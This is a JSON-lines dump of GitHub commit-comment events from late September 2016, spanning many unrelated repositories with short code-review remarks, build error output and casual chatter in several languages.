{"id":"4634892252","type":"CommitCommentEvent","actor":{"login":"tamsiuloong"},"repo":{"name":"tamsiuloong/springmvc-angular-crud"},"payload":{"comment":{"id":19218502,"position":null,"line":null,"path":null,"commit_id":"e5f62b1138938454f25ef88004f52a3df8251e04","created_at":"2016-09-29T03:50:40Z","updated_at":"2016-09-29T03:50:40Z","body":"怎么恢复"}},"created_at":"2016-09-29T03:50:40Z"}
{"id":"4634897790","type":"CommitCommentEvent","actor":{"login":"sharmab82"},"repo":{"name":"sharmab82/hello-world"},"payload":{"comment":{"id":19218511,"position":null,"line":null,"path":null,"commit_id":"b1d9a966318a8822362644a09c38bc4b9f88c367","created_at":"2016-09-29T03:52:35Z","updated_at":"2016-09-29T03:52:35Z","body":"Test 123"}},"created_at":"2016-09-29T03:52:35Z"}
{"id":"4634904264","type":"CommitCommentEvent","actor":{"login":"undisbeliever"},"repo":{"name":"undisbeliever/untech-editor"},"payload":{"comment":{"id":19218524,"position":null,"line":null,"path":null,"commit_id":"0449b1b6286a9bb59110bd052a02731e8934449c","created_at":"2016-09-29T03:55:05Z","updated_at":"2016-09-29T03:55:05Z","body":"Fixes #1 "}},"created_at":"2016-09-29T03:55:05Z"}
{"id":"4634904836","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19218527,"position":null,"line":null,"path":null,"commit_id":"54f3c9091fe081943846552a3ee0d33dbc755655","created_at":"2016-09-29T03:55:16Z","updated_at":"2016-09-29T03:55:16Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-29T03:55:16Z"}
{"id":"4634911633","type":"CommitCommentEvent","actor":{"login":"holcom73"},"repo":{"name":"holcom73/github-workflow-13"},"payload":{"comment":{"id":19218546,"position":null,"line":null,"path":null,"commit_id":"a29f653e544f56ad81f3d55eb7d5520b0b298bc8","created_at":"2016-09-29T03:57:46Z","updated_at":"2016-09-29T03:57:46Z","body":"the new file for Egypt studies"}},"created_at":"2016-09-29T03:57:46Z"}
{"id":"4634918515","type":"CommitCommentEvent","actor":{"login":"wrengr"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19218563,"position":null,"line":null,"path":null,"commit_id":"33c8ef733afe39a26437587d5a775b4d93a8f5c7","created_at":"2016-09-29T04:00:17Z","updated_at":"2016-09-29T04:00:17Z","body":"Those all sound like good reasons for forking the package. But I wonder\nwhether it'd be worthwhile to publish the fork separately (as something\nlike \"language-c-portable\" or \"language-c-minimal\")? I see two big reasons\nwhy that'd be nice. First, anyone else generating C code is likely to\nencounter similar issues, so it'd be nice to save them the work. Second, it\nhelps make sure the forked library remains independent of hakaru, which\nhelps ensure modularity.\n\nOn Wed, Sep 28, 2016 at 12:40 PM, Chung-chieh Shan <notifications@github.com\n> wrote:\n\n> All fine reasons; thanks :)\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/33c8ef733afe39a26437587d5a775b4d93a8f5c7#commitcomment-19213311>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC3BxyTU7Jn0JzUuUSpGqvbukvFbGMu3ks5qusKbgaJpZM4KJNLL>\n> .\n>\n\n\n\n-- \nLive well,\n~wren\n\nPhD candidate\nDepts. Cognitive Science & Computational Linguistics\nLindley Hall, room 330I\n150 S. Woodlawn Ave.\nBloomington, IN 47405\n"}},"created_at":"2016-09-29T04:00:17Z"}
{"id":"4634918697","type":"CommitCommentEvent","actor":{"login":"dalisoft"},"repo":{"name":"jonobr1/equalizer"},"payload":{"comment":{"id":19218565,"position":null,"line":null,"path":null,"commit_id":"6653efd98d7ef0331eab3bd274398661b0e72a58","created_at":"2016-09-29T04:00:20Z","updated_at":"2016-09-29T04:00:20Z","body":"A music sync with animation. I have animatio engine. I'm trying to implement to that for new Audio player app with almost 200+ equalizer"}},"created_at":"2016-09-29T04:00:20Z"}
{"id":"4634920617","type":"CommitCommentEvent","actor":{"login":"RichelleS"},"repo":{"name":"jonathanmettes/myfirstrepository"},"payload":{"comment":{"id":19218572,"position":null,"line":null,"path":null,"commit_id":"e0b030f5891bc8534acd17946bb6dff316acb3ae","created_at":"2016-09-29T04:00:58Z","updated_at":"2016-09-29T04:00:58Z","body":"Great course!"}},"created_at":"2016-09-29T04:00:58Z"}
{"id":"4634920928","type":"CommitCommentEvent","actor":{"login":"ayush29feb"},"repo":{"name":"vega/vega-lite"},"payload":{"comment":{"id":19218573,"position":56,"line":33,"path":"src/compile/mark/line.ts","commit_id":"7ce6d9611fe1212fbb9013468aca9983c9bfd550","created_at":"2016-09-29T04:01:05Z","updated_at":"2016-09-29T04:01:05Z","body":"@willium I think this is what you are looking for"}},"created_at":"2016-09-29T04:01:05Z"}
{"id":"4634921580","type":"CommitCommentEvent","actor":{"login":"carlfrie"},"repo":{"name":"startherellc/coaching-students"},"payload":{"comment":{"id":19218576,"position":null,"line":null,"path":null,"commit_id":"978869bd480f832cf9149de2641197adbdd74248","created_at":"2016-09-29T04:01:19Z","updated_at":"2016-09-29T04:01:19Z","body":"I believe it is, that is my most recent commit, correct? "}},"created_at":"2016-09-29T04:01:19Z"}
{"id":"4634926545","type":"CommitCommentEvent","actor":{"login":"smlsunxie"},"repo":{"name":"trunk-studio/cargocms"},"payload":{"comment":{"id":19218586,"position":5,"line":44,"path":"views-labfnp/admin/facebook/feed/vue.ejs","commit_id":"7e0afb194740f5a98f6362f4b946ab798fc69d40","created_at":"2016-09-29T04:03:10Z","updated_at":"2016-09-29T04:03:10Z","body":"真的沒有鬼，錯誤訊息要注意看\r\n\r\n` Error: ENOENT: no such file or directory, open '/Users/spooky/projects/trunk/cargocms/views-labfnp/admin/facebook/default/vue.ejs'`"}},"created_at":"2016-09-29T04:03:10Z"}
{"id":"4634932223","type":"CommitCommentEvent","actor":{"login":"Allanramirez1"},"repo":{"name":"google/material-design-lite"},"payload":{"comment":{"id":19218597,"position":null,"line":null,"path":null,"commit_id":"4944037bcd7099521687b6148a85594a57926e0f","created_at":"2016-09-29T04:05:23Z","updated_at":"2016-09-29T04:05:23Z","body":"I can't fix it. \r\n\r\n![screen](https://cloud.githubusercontent.com/assets/15525993/18940631/3cad249e-85c7-11e6-96b7-ebc2f3c1940a.png)\r\n\r\n"}},"created_at":"2016-09-29T04:05:23Z"}
{"id":"4634935071","type":"CommitCommentEvent","actor":{"login":"jeniffer-costa"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19218603,"position":7,"line":7,"path":"src/modulo-01-java-OO/modulo-01/Anao.java","commit_id":"814702799f67876bfec48ff9b94c459e6e676359","created_at":"2016-09-29T04:06:32Z","updated_at":"2016-09-29T04:06:32Z","body":"ok."}},"created_at":"2016-09-29T04:06:32Z"}
{"id":"4634935741","type":"CommitCommentEvent","actor":{"login":"FelipeErmeson"},"repo":{"name":"FelipeErmeson/MLPIII_CC__2016_2_LISTA3"},"payload":{"comment":{"id":19218606,"position":null,"line":null,"path":null,"commit_id":"c2dd59684c657eb71cf54dd75043c51ff70cc860","created_at":"2016-09-29T04:06:49Z","updated_at":"2016-09-29T04:06:49Z","body":"Felipe Ermeson e José Wiliam"}},"created_at":"2016-09-29T04:06:49Z"}
{"id":"4634936144","type":"CommitCommentEvent","actor":{"login":"jerrybendy"},"repo":{"name":"jerrybendy/phpstorm-webstorm-skills"},"payload":{"comment":{"id":19218608,"position":40,"line":24,"path":"docs/002.keyboard-shortcuts-you-cannot-miss.md","commit_id":"0df6b7a14aea310a71efabcc6ad7d660c27412f0","created_at":"2016-09-29T04:06:59Z","updated_at":"2016-09-29T04:06:59Z","body":"@fwolf  可以直接用工具呀， 我用的 MWeb ，可以直接操作 markdown 中的表格，自动生成，方便多了 "}},"created_at":"2016-09-29T04:06:59Z"}
{"id":"4634936175","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19218609,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T04:06:59Z","updated_at":"2016-09-29T04:06:59Z","body":"1000个Object，不能再多了，再多就卡了。\r\n\r\n![](https://assets-cdn.github.com/images/icons/emoji/unicode/1f602.png)\r\n"}},"created_at":"2016-09-29T04:06:59Z"}
{"id":"4634936746","type":"CommitCommentEvent","actor":{"login":"jeniffer-costa"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19218613,"position":15,"line":15,"path":"src/modulo-01-java-OO/modulo-01/Anao.java","commit_id":"814702799f67876bfec48ff9b94c459e6e676359","created_at":"2016-09-29T04:07:14Z","updated_at":"2016-09-29T04:07:14Z","body":"Retirei o método setQuantVida()."}},"created_at":"2016-09-29T04:07:14Z"}
{"id":"4634938322","type":"CommitCommentEvent","actor":{"login":"FelipeErmeson"},"repo":{"name":"FelipeErmeson/MLPIII_CC__2016_2_LISTA3"},"payload":{"comment":{"id":19218616,"position":null,"line":null,"path":null,"commit_id":"1aed6127ecaaabe0dc4523fcd15016a342d69292","created_at":"2016-09-29T04:07:51Z","updated_at":"2016-09-29T04:07:51Z","body":"EQUIPE: Felipe Ermeson e José William"}},"created_at":"2016-09-29T04:07:51Z"}
{"id":"4634938514","type":"CommitCommentEvent","actor":{"login":"jeniffer-costa"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19218617,"position":12,"line":12,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"814702799f67876bfec48ff9b94c459e6e676359","created_at":"2016-09-29T04:07:56Z","updated_at":"2016-09-29T04:07:56Z","body":"Alterei a lógica do método."}},"created_at":"2016-09-29T04:07:56Z"}
{"id":"4634939294","type":"CommitCommentEvent","actor":{"login":"jeniffer-costa"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19218618,"position":16,"line":16,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"814702799f67876bfec48ff9b94c459e6e676359","created_at":"2016-09-29T04:08:17Z","updated_at":"2016-09-29T04:08:17Z","body":"Adicionei novos casos de teste."}},"created_at":"2016-09-29T04:08:17Z"}
{"id":"4634941861","type":"CommitCommentEvent","actor":{"login":"kevinsdreams"},"repo":{"name":"kevinsdreams/testgit"},"payload":{"comment":{"id":19218624,"position":1,"line":1,"path":"README.md","commit_id":"39be08101b80e6acde38d7f16bcb2b239c7a74f0","created_at":"2016-09-29T04:09:17Z","updated_at":"2016-09-29T04:09:17Z","body":"jesus i love you ,my lord."}},"created_at":"2016-09-29T04:09:17Z"}
{"id":"4634942172","type":"CommitCommentEvent","actor":{"login":"kevinsdreams"},"repo":{"name":"kevinsdreams/testgit"},"payload":{"comment":{"id":19218626,"position":1,"line":1,"path":"README.md","commit_id":"39be08101b80e6acde38d7f16bcb2b239c7a74f0","created_at":"2016-09-29T04:09:25Z","updated_at":"2016-09-29T04:09:25Z","body":"hahaha"}},"created_at":"2016-09-29T04:09:25Z"}
{"id":"4634943711","type":"CommitCommentEvent","actor":{"login":"govint"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19218627,"position":null,"line":null,"path":null,"commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-29T04:10:01Z","updated_at":"2016-09-29T04:10:01Z","body":"The threads can be tracked a list of threads may be, but not in volume meta-data, there's no need for tracking per volume. Just the set of requests that are in-flight at the moment. May be not this PR. \r\n\r\nAnother test would be to have a bunch of parallel tasks (create, delete, attach, detach) issued to the server and the server is restarted. Check if volume meta-data is impacted, can operations be retried (volume created but not formatted and user can't create the volume as it exists)."}},"created_at":"2016-09-29T04:10:01Z"}
{"id":"4634947927","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19218631,"position":null,"line":null,"path":null,"commit_id":"d32edee386f29909e6a4ac2fd5735c4b269308e7","created_at":"2016-09-29T04:11:44Z","updated_at":"2016-09-29T04:11:44Z","body":"yea, I probbaly should have chosen a different mob for Dathomir to upgrade. Forgot they are the main source of income for most players"}},"created_at":"2016-09-29T04:11:44Z"}
{"id":"4634947942","type":"CommitCommentEvent","actor":{"login":"jpalermo"},"repo":{"name":"cloudfoundry/cf-mysql-release"},"payload":{"comment":{"id":19218632,"position":4,"line":5,"path":"jobs/mysql/templates/mariadb_init.erb","commit_id":"a42245184486654ad441a6befeadf0775fb0311a","created_at":"2016-09-29T04:11:44Z","updated_at":"2016-09-29T04:11:44Z","body":"I would recommend doing the user dropping before creating the admin user. That way if they mistakenly specify the same user for both, they'll still have a user."}},"created_at":"2016-09-29T04:11:44Z"}
{"id":"4634954234","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"jasmine/jasmine"},"payload":{"comment":{"id":19218636,"position":null,"line":null,"path":null,"commit_id":"d85d6dd4b8a71aede68732d6fc8222bfd5000c6b","created_at":"2016-09-29T04:14:31Z","updated_at":"2016-09-29T04:14:31Z","body":"Hooray, spies with arity + a passing build! Thanks for this, @slackersoft."}},"created_at":"2016-09-29T04:14:31Z"}
{"id":"4634957895","type":"CommitCommentEvent","actor":{"login":"ashdnazg"},"repo":{"name":"spring/devgame.sdd"},"payload":{"comment":{"id":19218644,"position":null,"line":null,"path":null,"commit_id":"588a70fc7bf4ed2fa4842cb6f7cb0b88fec31843","created_at":"2016-09-29T04:16:09Z","updated_at":"2016-09-29T04:16:09Z","body":"Conversion"}},"created_at":"2016-09-29T04:16:09Z"}
{"id":"4634964630","type":"CommitCommentEvent","actor":{"login":"stormxue"},"repo":{"name":"stormxue/stormxue.github.io"},"payload":{"comment":{"id":19218654,"position":null,"line":null,"path":null,"commit_id":"dba8d7d794aef1f9059e806917b9dcfca00375b4","created_at":"2016-09-29T04:19:08Z","updated_at":"2016-09-29T04:19:08Z","body":"域名设置文件"}},"created_at":"2016-09-29T04:19:08Z"}
{"id":"4634967007","type":"CommitCommentEvent","actor":{"login":"10089"},"repo":{"name":"sujianchao/GoWorld"},"payload":{"comment":{"id":19218655,"position":null,"line":null,"path":null,"commit_id":"3f8952c4e4e1505ea4eb5e9c77311f1cde3445c3","created_at":"2016-09-29T04:20:14Z","updated_at":"2016-09-29T04:20:14Z","body":"呵呵，怎么自己更新了？试试[这个](https://github.com/10089/hello)吧 "}},"created_at":"2016-09-29T04:20:14Z"}
{"id":"4634967492","type":"CommitCommentEvent","actor":{"login":"Addisonbean"},"repo":{"name":"Addisonbean/Beowulf"},"payload":{"comment":{"id":19218656,"position":5,"line":107,"path":"js/item.js","commit_id":"7efc7c93c10a29e4f5c2263b1a36160186d2c19c","created_at":"2016-09-29T04:20:27Z","updated_at":"2016-09-29T04:20:27Z","body":"What's the difference between `map_xp` and `xp`?"}},"created_at":"2016-09-29T04:20:27Z"}
{"id":"4634967515","type":"CommitCommentEvent","actor":{"login":"GAONNR"},"repo":{"name":"kanglib/dancing-machine"},"payload":{"comment":{"id":19218658,"position":null,"line":null,"path":null,"commit_id":"9de381c9c6a339dd7fd0c7322c199175a66349b6","created_at":"2016-09-29T04:20:28Z","updated_at":"2016-09-29T04:20:28Z","body":"fuck you"}},"created_at":"2016-09-29T04:20:28Z"}
{"id":"4634967898","type":"CommitCommentEvent","actor":{"login":"AlexOugh"},"repo":{"name":"SungardAS/aws-services"},"payload":{"comment":{"id":19218659,"position":13,"line":127,"path":"cloudformation/iam_federation.js","commit_id":"3f45772ffdab32c3fa3ab4ca58402c655d5284c0","created_at":"2016-09-29T04:20:37Z","updated_at":"2016-09-29T04:20:37Z","body":"isn't this failed if the target to remove is not in an array?"}},"created_at":"2016-09-29T04:20:37Z"}
{"id":"4634968432","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":19218660,"position":null,"line":null,"path":null,"commit_id":"5481348f5ed37e712aa0fd33d699ecda5139cf6f","created_at":"2016-09-29T04:20:51Z","updated_at":"2016-09-29T04:20:51Z","body":"If above line (libc-headers) exists on your OE (and OE-A use this), means that you are building with old libc-headers where `DTV_ENUM_DELSYS` is not known yet. So a patch required to keep backwards compatibility, like @taapat mentioned before."}},"created_at":"2016-09-29T04:20:51Z"}
{"id":"4634968781","type":"CommitCommentEvent","actor":{"login":"Addisonbean"},"repo":{"name":"Addisonbean/Beowulf"},"payload":{"comment":{"id":19218661,"position":5,"line":107,"path":"js/item.js","commit_id":"7efc7c93c10a29e4f5c2263b1a36160186d2c19c","created_at":"2016-09-29T04:21:02Z","updated_at":"2016-09-29T04:21:02Z","body":"Never mind, I now see that says `max_xp`, not `map_xp`..."}},"created_at":"2016-09-29T04:21:02Z"}
{"id":"4634970323","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19218664,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T04:21:42Z","updated_at":"2016-09-29T04:21:42Z","body":"就C#那水准还DSL呢。代码噪声太多了。\r\n\r\n必须要Kotlin这种极简的才行。"}},"created_at":"2016-09-29T04:21:42Z"}
{"id":"4634970444","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19218665,"position":null,"line":null,"path":null,"commit_id":"d3ef6f70f2c1795c55602f36362542366af5674e","created_at":"2016-09-29T04:21:45Z","updated_at":"2016-09-29T04:21:45Z","body":"@aschwaighofer This needs a test"}},"created_at":"2016-09-29T04:21:45Z"}
{"id":"4634971743","type":"CommitCommentEvent","actor":{"login":"kevinkorte"},"repo":{"name":"kevinkorte/redrhino"},"payload":{"comment":{"id":19218670,"position":null,"line":null,"path":null,"commit_id":"ee4f6030d9394c6787c4586b35e78782b2a37d4d","created_at":"2016-09-29T04:22:23Z","updated_at":"2016-09-29T04:22:23Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create login form](https://trello.com/c/E63lnFix/3-create-login-form)"}},"created_at":"2016-09-29T04:22:23Z"}
{"id":"4634973141","type":"CommitCommentEvent","actor":{"login":"fredrb"},"repo":{"name":"fredrb/spaceExplorer"},"payload":{"comment":{"id":19218676,"position":null,"line":null,"path":null,"commit_id":"9d71d5ade943c504a585bce22549517af54459e7","created_at":"2016-09-29T04:23:00Z","updated_at":"2016-09-29T04:23:00Z","body":"Closing: #7 "}},"created_at":"2016-09-29T04:23:00Z"}
{"id":"4634978908","type":"CommitCommentEvent","actor":{"login":"Addisonbean"},"repo":{"name":"Addisonbean/Beowulf"},"payload":{"comment":{"id":19218688,"position":null,"line":null,"path":null,"commit_id":"7efc7c93c10a29e4f5c2263b1a36160186d2c19c","created_at":"2016-09-29T04:25:37Z","updated_at":"2016-09-29T04:25:37Z","body":"Hm, that's weird. I'll look into that."}},"created_at":"2016-09-29T04:25:37Z"}
{"id":"4634979286","type":"CommitCommentEvent","actor":{"login":"cgilmour"},"repo":{"name":"romana/romana"},"payload":{"comment":{"id":19218690,"position":5,"line":94,"path":"romana-install/roles/romana/install-master/templates/config/romana.conf.yml","commit_id":"70c5b50557ea70654717f337451bbc197ac0a5d1","created_at":"2016-09-29T04:25:47Z","updated_at":"2016-09-29T04:25:47Z","body":"This is breaking devstack / openstack installs because `romana_segment_label_name` only gets defined for kubernetes / `kube_nodes`\r\n\r\nOne fix would be different config templates for the different stack types, since this section is only relevant for kubernetes."}},"created_at":"2016-09-29T04:25:47Z"}
{"id":"4634984534","type":"CommitCommentEvent","actor":{"login":"adamzaninovich"},"repo":{"name":"tielur/project_euler"},"payload":{"comment":{"id":19218695,"position":32,"line":32,"path":"problems/elixir/problem_2/lib/problem_2.ex","commit_id":"cd9a2e257bf9e249a4ab38a92bbff301a7a091f3","created_at":"2016-09-29T04:28:07Z","updated_at":"2016-09-29T04:28:07Z","body":"😍 "}},"created_at":"2016-09-29T04:28:07Z"}
{"id":"4634986487","type":"CommitCommentEvent","actor":{"login":"adiazwise"},"repo":{"name":"adiazwise/codepath_prework"},"payload":{"comment":{"id":19218718,"position":null,"line":null,"path":null,"commit_id":"669bb288a21c3ba8dcaddb200c72e4368684b1dc","created_at":"2016-09-29T04:28:57Z","updated_at":"2016-09-29T04:28:57Z","body":"bug nombre autor"}},"created_at":"2016-09-29T04:28:57Z"}
{"id":"4634990653","type":"CommitCommentEvent","actor":{"login":"adiazwise"},"repo":{"name":"adiazwise/codepath_prework"},"payload":{"comment":{"id":19218739,"position":null,"line":null,"path":null,"commit_id":"669bb288a21c3ba8dcaddb200c72e4368684b1dc","created_at":"2016-09-29T04:30:41Z","updated_at":"2016-09-29T04:30:41Z","body":"Add Image"}},"created_at":"2016-09-29T04:30:41Z"}
{"id":"4634991027","type":"CommitCommentEvent","actor":{"login":"pinkas"},"repo":{"name":"pinkas/Mission169"},"payload":{"comment":{"id":19218740,"position":null,"line":null,"path":null,"commit_id":"b73c4bb0d1bfb949e747415ce7db2e0727b67dbe","created_at":"2016-09-29T04:30:52Z","updated_at":"2016-09-29T04:30:52Z","body":"Me on my brother's laptop ..."}},"created_at":"2016-09-29T04:30:52Z"}
{"id":"4634994041","type":"CommitCommentEvent","actor":{"login":"jbrendel"},"repo":{"name":"romana/romana"},"payload":{"comment":{"id":19218749,"position":5,"line":94,"path":"romana-install/roles/romana/install-master/templates/config/romana.conf.yml","commit_id":"70c5b50557ea70654717f337451bbc197ac0a5d1","created_at":"2016-09-29T04:32:12Z","updated_at":"2016-09-29T04:32:12Z","body":"The label name is exposed in K8S only, since it needs to match what people write into their pod and policy definitions. What's the equivalent for OpenStack, though? Is there a 'label name' equivalent for OpenStack? What exactly breaks in OpenStack?\r\n "}},"created_at":"2016-09-29T04:32:12Z"}
{"id":"4634994147","type":"CommitCommentEvent","actor":{"login":"adiazwise"},"repo":{"name":"adiazwise/codepath_prework"},"payload":{"comment":{"id":19218750,"position":null,"line":null,"path":null,"commit_id":"669bb288a21c3ba8dcaddb200c72e4368684b1dc","created_at":"2016-09-29T04:32:15Z","updated_at":"2016-09-29T04:32:15Z","body":"minor changes"}},"created_at":"2016-09-29T04:32:15Z"}
{"id":"4634996027","type":"CommitCommentEvent","actor":{"login":"cgilmour"},"repo":{"name":"romana/romana"},"payload":{"comment":{"id":19218754,"position":5,"line":94,"path":"romana-install/roles/romana/install-master/templates/config/romana.conf.yml","commit_id":"70c5b50557ea70654717f337451bbc197ac0a5d1","created_at":"2016-09-29T04:33:07Z","updated_at":"2016-09-29T04:33:07Z","body":"```\r\nTASK [romana/install-master : Install config file] *****************************\r\nfatal: [earthy-controller]: FAILED! => {\"changed\": false, \"failed\": true, \"msg\": \"AnsibleUndefinedVariable: 'romana_segment_label_name' is undefined\"}\r\n```"}},"created_at":"2016-09-29T04:33:07Z"}
{"id":"4634996082","type":"CommitCommentEvent","actor":{"login":"wgzGitHub"},"repo":{"name":"wgzGitHub/hello-world"},"payload":{"comment":{"id":19218755,"position":2,"line":2,"path":"README.md","commit_id":"9c3f7163afb1055580c2f61c63af3640a50055fb","created_at":"2016-09-29T04:33:09Z","updated_at":"2016-09-29T04:33:09Z","body":"程序"}},"created_at":"2016-09-29T04:33:09Z"}
{"id":"4635001987","type":"CommitCommentEvent","actor":{"login":"simnalamburt"},"repo":{"name":"bacchus-snu/password"},"payload":{"comment":{"id":19218764,"position":null,"line":null,"path":null,"commit_id":"fd80ba2aedaddf8bf99133d5c9a411322f13daf2","created_at":"2016-09-29T04:35:50Z","updated_at":"2016-09-29T04:35:50Z","body":"👍 \r\n\r\nflow는 쓰기 힘드시면 걷어내셔도 됩니다 ㅎㅎ"}},"created_at":"2016-09-29T04:35:50Z"}
{"id":"4635008550","type":"CommitCommentEvent","actor":{"login":"jonobr1"},"repo":{"name":"jonobr1/equalizer"},"payload":{"comment":{"id":19218773,"position":null,"line":null,"path":null,"commit_id":"6653efd98d7ef0331eab3bd274398661b0e72a58","created_at":"2016-09-29T04:38:44Z","updated_at":"2016-09-29T04:38:44Z","body":"Nice! Please share what you make! I'd love to see. Have lots of plans for\nthis little lib :)\nOn Wed, Sep 28, 2016 at 9:00 PM dalisoft <notifications@github.com> wrote:\n\n> A music sync with animation. I have animatio engine. I'm trying to\n> implement to that for new Audio player app with almost 200+ equalizer\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jonobr1/equalizer/commit/6653efd98d7ef0331eab3bd274398661b0e72a58#commitcomment-19218565>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AANbgWeRGnD_7bmeuDZZsbO83u_MyWUlks5quzfUgaJpZM4KIz8n>\n> .\n>\n-- \nhttp://jonobr1.com/\n"}},"created_at":"2016-09-29T04:38:44Z"}
{"id":"4635010708","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19218782,"position":null,"line":null,"path":null,"commit_id":"875a81c749f8029722eb8ba06c84c19ab6428106","created_at":"2016-09-29T04:39:41Z","updated_at":"2016-09-29T04:39:41Z","body":"> can be reused\r\n\r\nYou could actually have reused it :|"}},"created_at":"2016-09-29T04:39:41Z"}
{"id":"4635013447","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19218788,"position":null,"line":null,"path":null,"commit_id":"875a81c749f8029722eb8ba06c84c19ab6428106","created_at":"2016-09-29T04:40:52Z","updated_at":"2016-09-29T04:40:52Z","body":"also\r\n\r\n> Rank\r\n\r\nWe've called it \"group\" in some places and \"auth\" in other places, but we've never called it \"rank\" anywhere in the code.\r\n\r\n\"matches\" also isn't the best name for an \"at least\" relationship..."}},"created_at":"2016-09-29T04:40:52Z"}
{"id":"4635014782","type":"CommitCommentEvent","actor":{"login":"vt0r"},"repo":{"name":"vt0r/kernvatore-angler"},"payload":{"comment":{"id":19218791,"position":null,"line":null,"path":null,"commit_id":"0302d34dafe79574a340c4e938c853b2ed423e26","created_at":"2016-09-29T04:41:31Z","updated_at":"2016-09-29T04:41:31Z","body":"Good night, sweet `cfq` prince"}},"created_at":"2016-09-29T04:41:31Z"}
{"id":"4635016488","type":"CommitCommentEvent","actor":{"login":"martint"},"repo":{"name":"electrum/presto"},"payload":{"comment":{"id":19218793,"position":null,"line":null,"path":null,"commit_id":"4510d9643a52e96f2d24cb6fb776bf7d31b830ba","created_at":"2016-09-29T04:42:17Z","updated_at":"2016-09-29T04:42:17Z","body":"This seems a bit heavy-handed to me"}},"created_at":"2016-09-29T04:42:17Z"}
{"id":"4635019273","type":"CommitCommentEvent","actor":{"login":"kerrande"},"repo":{"name":"HideYoWhiskey/Algorithms"},"payload":{"comment":{"id":19218801,"position":null,"line":null,"path":null,"commit_id":"511e9d037a74fff9504539f54bc3bd78586dabd2","created_at":"2016-09-29T04:43:34Z","updated_at":"2016-09-29T04:43:34Z","body":"What is this."}},"created_at":"2016-09-29T04:43:34Z"}
{"id":"4635031762","type":"CommitCommentEvent","actor":{"login":"hameerabbasi"},"repo":{"name":"hameerabbasi/AndroidSMSBackupRestoreCleaner"},"payload":{"comment":{"id":19218823,"position":null,"line":null,"path":null,"commit_id":"97182a43eeeec92eab5a0160e747e97a903fb683","created_at":"2016-09-29T04:48:52Z","updated_at":"2016-09-29T04:48:52Z","body":"@Koneesha Would you please make a GitHub issue (on the Issues section), and (if possible) attach a small sample that shows the issue?\r\n\r\nI personally don't send MMS so I didn't test this. But I will try to fix it."}},"created_at":"2016-09-29T04:48:52Z"}
{"id":"4635032739","type":"CommitCommentEvent","actor":{"login":"Nikitaw99"},"repo":{"name":"octocat/Hello-World"},"payload":{"comment":{"id":19218826,"position":null,"line":null,"path":null,"commit_id":"762941318ee16e59dabbacb1b4049eec22f0d303","created_at":"2016-09-29T04:49:16Z","updated_at":"2016-09-29T04:49:16Z","body":"![unsubscribing was worth it](http://i.imgur.com/WdRnR3s.gif)"}},"created_at":"2016-09-29T04:49:16Z"}
{"id":"4635035062","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19218829,"position":null,"line":null,"path":null,"commit_id":"a4f7921237ab1625f71e69621adb12085be0aa07","created_at":"2016-09-29T04:50:04Z","updated_at":"2016-09-29T04:50:04Z","body":"FEMALE代表:女\r\n参数错误\r\nFEMALE代表:女"}},"created_at":"2016-09-29T04:50:04Z"}
{"id":"4635036059","type":"CommitCommentEvent","actor":{"login":"joadr"},"repo":{"name":"joadr/federeichon"},"payload":{"comment":{"id":19218831,"position":null,"line":null,"path":null,"commit_id":"012b806a8ec1a8db8664f76c5e51653433f8f6ae","created_at":"2016-09-29T04:50:28Z","updated_at":"2016-09-29T04:50:28Z","body":"perfect!"}},"created_at":"2016-09-29T04:50:28Z"}
{"id":"4635040562","type":"CommitCommentEvent","actor":{"login":"JGelfand"},"repo":{"name":"FRCTeam159/2017-Robot-Code"},"payload":{"comment":{"id":19218839,"position":2,"line":2,"path":"NewSherise/.settings/language.settings.xml","commit_id":"d8622e6d9ff534097fcf0e9d0c1b29baba3736ef","created_at":"2016-09-29T04:52:21Z","updated_at":"2016-09-29T04:52:21Z","body":"I feel like we've had issues with language settings.xml causing conflicts between different computers in the past. We should probably remove this from the repo. @dwsindorf  do you remember if it was this file?"}},"created_at":"2016-09-29T04:52:21Z"}
